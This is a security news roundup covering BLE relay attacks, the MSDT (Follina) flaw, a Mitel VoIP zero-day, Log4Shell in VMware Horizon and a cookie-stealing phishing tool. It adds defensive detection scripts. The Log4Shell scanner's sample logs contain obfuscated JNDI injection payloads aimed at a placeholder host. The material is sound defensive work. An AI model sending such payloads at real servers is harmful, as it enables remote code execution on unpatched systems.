June 2022 Security Update: Microsoft Office, Mitel, and Bluetooth Vulnerabilities

Attack vectors multiply as threat actors explore new ways into systems and into the data those systems hold.


BLE Vulnerability Discovered

If you develop solutions that rely on Bluetooth Low Energy (BLE), look into research by NCC Group. Sultan Qasim Khan, principal security consultant and researcher, has conducted the world’s first link-layer relay attack on BLE. The attack tricked devices into thinking the owner was nearby and conceivably could be carried out from anywhere in the world. Moreover, it works even when a vendor has incorporated encryption and latency bounding.

Action Items:

  • Systems that use BLE as their sole security control should add other security measures.
  • Require user interactions to unlock devices.
  • Disable passive unlock functions when the user’s devices have been stationary.
  • Read NCC Group’s technical advisory: BLE Proximity Authentication Vulnerability to Relay Attacks.

Microsoft Support Diagnostic Tool Can Be Used Against You

CVE-2022-30190 allows attackers to hijack IT environments through endpoints running Windows or Microsoft Office. A remote code execution vulnerability in the Microsoft Support Diagnostic Tool (MSDT) lets an attacker run arbitrary code with the privileges of the calling application, which in turn lets them install programs; view, change, or delete data; or create new user accounts.

This vulnerability affects 41 products, including Windows 7 through 11, Windows Server 2008 through 2022, and Office, including Office 2016, 2021, and 2022. Microsoft issued a patch on June 14, 2022, along with patches for more than 50 other vulnerabilities and issues.

Action Items:

Dirk Schrader, resident CISO (EMEA) and VP of security research at Netwrix, suggests that to increase security:

  • Closely monitor changes within an organization’s systems, especially system folders, and detect any unwanted processes.
  • Establish a set of Windows group policies that lock down the system so the exploit can’t execute functions.
  • Stay vigilant for escalations, such as combining the exploit with spear-phishing.

He adds, “The similarities with Log4shell, which made headlines in December 2021, are striking. Same as it, this vulnerability is about using an application’s ability to remotely call for a resource using the URI scheme and not having safeguards in place. We can expect APT groups and cyber crooks to specifically look for more of these as they seem to offer an easy way in.”
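The first action item above, detecting unwanted processes, comes down to one process-tree relationship for this vulnerability: an Office application starting msdt.exe, often with the ms-msdt: URI scheme on the command line. The following script is an added example, not code from Microsoft or Netwrix; the process-creation events it scans are constructed, and the key="value" event format is an assumption standing in for whatever your EDR or Sysmon export produces.

```python
"""Detection check for CVE-2022-30190-style abuse: an Office application spawning
msdt.exe. Added example, not code from Microsoft or Netwrix; the log lines are
constructed, and the key="value" event format is an assumption."""
import re
from typing import Dict, List

# Office binaries that are the usual parents in this abuse pattern (assumption:
# extend the set to match the Office suite you deploy).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
TARGET_CHILD = "msdt.exe"

# Constructed sample process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    r'ts="2022-06-01T09:12:03Z" host="WS01" parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\System32\msdt.exe" cmdline="msdt.exe ms-msdt:/id (constructed)"',
    r'ts="2022-06-01T09:15:44Z" host="WS01" parent="C:\Windows\explorer.exe" image="C:\Windows\System32\msdt.exe" cmdline="msdt.exe -path C:\Windows\diagnostics\index\NetworkDiagnosticsWeb.xml"',
    r'ts="2022-06-01T09:20:10Z" host="WS02" parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\splwow64.exe" cmdline="splwow64.exe 12288"',
    r'ts="2022-06-01T09:31:00Z" host="WS03" parent="C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" image="C:\Windows\System32\msdt.exe" cmdline="msdt.exe ms-msdt:/id (constructed)"',
]

_KV = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key="value" event line into a dict (values carry no embedded quotes)."""
    return dict(_KV.findall(line))


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_office_spawning_msdt(ev: Dict[str, str]) -> bool:
    """Core rule: the parent is an Office app and the new process is msdt.exe."""
    return (basename(ev.get("parent", "")) in OFFICE_PARENTS
            and basename(ev.get("image", "")) == TARGET_CHILD)


def uses_msdt_uri(ev: Dict[str, str]) -> bool:
    """Secondary signal: the ms-msdt: URI scheme appears on the command line."""
    return "ms-msdt:" in ev.get("cmdline", "").lower()


def find_alerts(lines: List[str]) -> List[Dict[str, str]]:
    """Return the events that match the rule, each annotated with a reason string."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if is_office_spawning_msdt(ev):
            reason = "Office application spawned msdt.exe"
            if uses_msdt_uri(ev):
                reason += " via ms-msdt: URI"
            alerts.append({**ev, "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert["ts"], alert["host"], alert["reason"])
```

Run against Sysmon Event ID 1 (process creation) or an equivalent EDR export, the rule fires on the two Office-launched msdt.exe events and stays quiet on msdt.exe started from Explorer and on Word's legitimate print helper. The parent/child relationship is the durable signal; the ms-msdt: string is useful corroboration but trivially omitted. Alongside the patch, Microsoft's published workaround at the time was to disable the MSDT URL protocol handler (back up and then delete the HKEY_CLASSES_ROOT\ms-msdt registry key), which is the kind of group-policy lockdown the second action item refers to.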

Ransomware Attack Attempted on a VoIP Device

Cybersecurity firm CrowdStrike traced an attempted ransomware attack to a Mitel VoIP appliance, which led to the assignment of CVE-2022-29499. The attackers used a novel remote code execution exploit to gain access and then used anti-forensic techniques on the VoIP device to try to hide their activity. The zero-day has since been patched.

Action Items:

  • Mitel has provided a script for remediation; address this critical vulnerability as soon as possible.
  • See the security advisory.

Log4Shell in VMware Horizon Systems Is Still a Vulnerability

CISA issued an alert on June 23, 2022, warning that threat actors, including state-sponsored actors, continue to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon and Unified Access Gateway (UAG) servers. The vulnerability has been an issue since December 2021, and threat actors have been exploiting unpatched systems ever since.

Action Items:

  • Update all VMware Horizon and UAG systems to the most updated versions.
  • If you didn’t apply all updates for Log4Shell issued in December 2021, treat the system as compromised.
  • Minimize the attack surface by hosting essential services on a segregated network with strict access control and web application firewalls (WAFs) in front of public-facing services.
  • If a compromise occurs, immediately isolate the affected systems; collect and review logs, data, and artifacts; consider engaging support from an incident response organization; and report incidents to CISA at report@cisa.gov or 888-282-0870.
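Reviewing logs for Log4Shell activity is harder than grepping for "jndi", because the lookup string is routinely hidden behind nested lookups and URL encoding. The scanner below is an added example, not code from CISA or VMware: it undoes the common obfuscations and then looks for the lookup. The access-log lines are constructed, use documentation IP ranges, and their shape (one request per line, user agent at the end) is an assumption about how your UAG, Horizon, or reverse-proxy logs are exported.

```python
"""Scan web-server log lines for Log4Shell (CVE-2021-44228) lookup strings, including
the case-folding, default-value and URL-encoding obfuscations that evade a naive grep
for 'jndi'. Added example, not code from CISA or VMware; the log lines are constructed
and use documentation IP ranges, and the access-log shape is an assumption."""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample lines (assumption: logs exported one request per line).
# Lines 1 to 4 carry lookup strings in different disguises; 0 and 5 are benign.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jun/2022:10:01:02 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Jun/2022:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [23/Jun/2022:10:02:11 +0000] "GET / HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.9:1389/b}"',
    '203.0.113.9 - - [23/Jun/2022:10:03:40 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.9/c} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.9 - - [23/Jun/2022:10:03:55 +0000] "GET /?x=%24%7Bjndi%3Adns%3A//198.51.100.9/d%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.10 - - [23/Jun/2022:10:04:00 +0000] "GET /api/jndi-docs HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x} collapse to x; ${anything:-x} collapses to its default value x.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# After normalisation, the lookup we actually care about, with its protocol captured.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def normalise(text: str, max_rounds: int = 10) -> str:
    """Peel nested lookups from the inside out until nothing changes (bounded)."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            return new
        text = new
    return text


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, protocol) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalise(unquote(line))
        match = _JNDI.search(norm)
        if match:
            hits.append((i, match.group(1).lower()))
    return hits


if __name__ == "__main__":
    for index, proto in scan(SAMPLE_LOG):
        print(f"line {index}: jndi lookup via {proto}")
```

A hit on a Horizon or UAG log is only the start of the review the action items call for: the protocol and destination in the normalised string tell you where the server would have reached out, so the next step is to check outbound connection logs for that destination and treat the host as compromised if the request predates your December 2021 patching.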

Phishing Attack Bypasses MFA

The WebView2-Cookie-Stealer is enabling hackers to steal a victim’s authentication cookies so they can bypass multifactor authentication (MFA) and log into accounts with stolen credentials. Bleeping Computer explains that the attack uses a WebView2 executable that opens a website login form inside the application. Using WebView2, a hacker can access cookies and inject JavaScript that logs keystrokes, steals authentication cookies, and sends them to a remote server.

Cybersecurity researcher mr.dox told Bleeping Computer that the attack requires social engineering – the attacker has to convince a user to download and run the malicious application.

Action Items:

  • Educate users on email security best practices.
  • Don’t download applications from untrusted sources.
  • Make sure antimalware is up to date.

For more security updates and insights, visit DevPro Journal’s Security resources page.

Jay McCall

Jay McCall is an editor and journalist with 20 years of writing experience for B2B IT solution providers. Jay is a cofounder of Managed Services Journal and DevPro Journal.
